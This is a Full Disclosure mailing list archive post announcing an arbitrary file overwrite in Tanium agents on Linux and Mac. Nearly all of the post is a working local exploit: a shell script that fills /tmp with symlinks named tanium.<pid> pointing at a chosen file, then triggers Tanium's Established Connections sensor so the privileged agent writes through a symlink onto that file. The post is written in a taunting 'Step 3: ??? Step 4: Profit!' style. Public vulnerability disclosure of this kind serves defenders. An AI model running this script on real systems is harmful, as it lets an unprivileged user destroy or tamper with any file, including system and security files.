Full Disclosure mailing list archives



[CVE-2015-1234] Tanium all versions arbitrary file overwrite

############################################################## # # # TANIUM ALL VERSIONS ARBITRARY FILE OVERWRITE # # # # TANIUM allows lowest privileged users on # # Linux and Mac systems to overwrite any file # # of their choosing in 15 seconds. # # # # Impossible? Think again. # # # ############################################################## Step 1: #!/bin/sh i=0; j=$(cat /proc/sys/kernel/pid_max) while true; do ln -s $1 /tmp/tanium.$i [ $i -eq $j ] && break i=$((i+1)) done Step 2: Execute Established Connections sensor. Step 3: ??? Step 4: Profit! _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/

By Date By Thread

Current thread: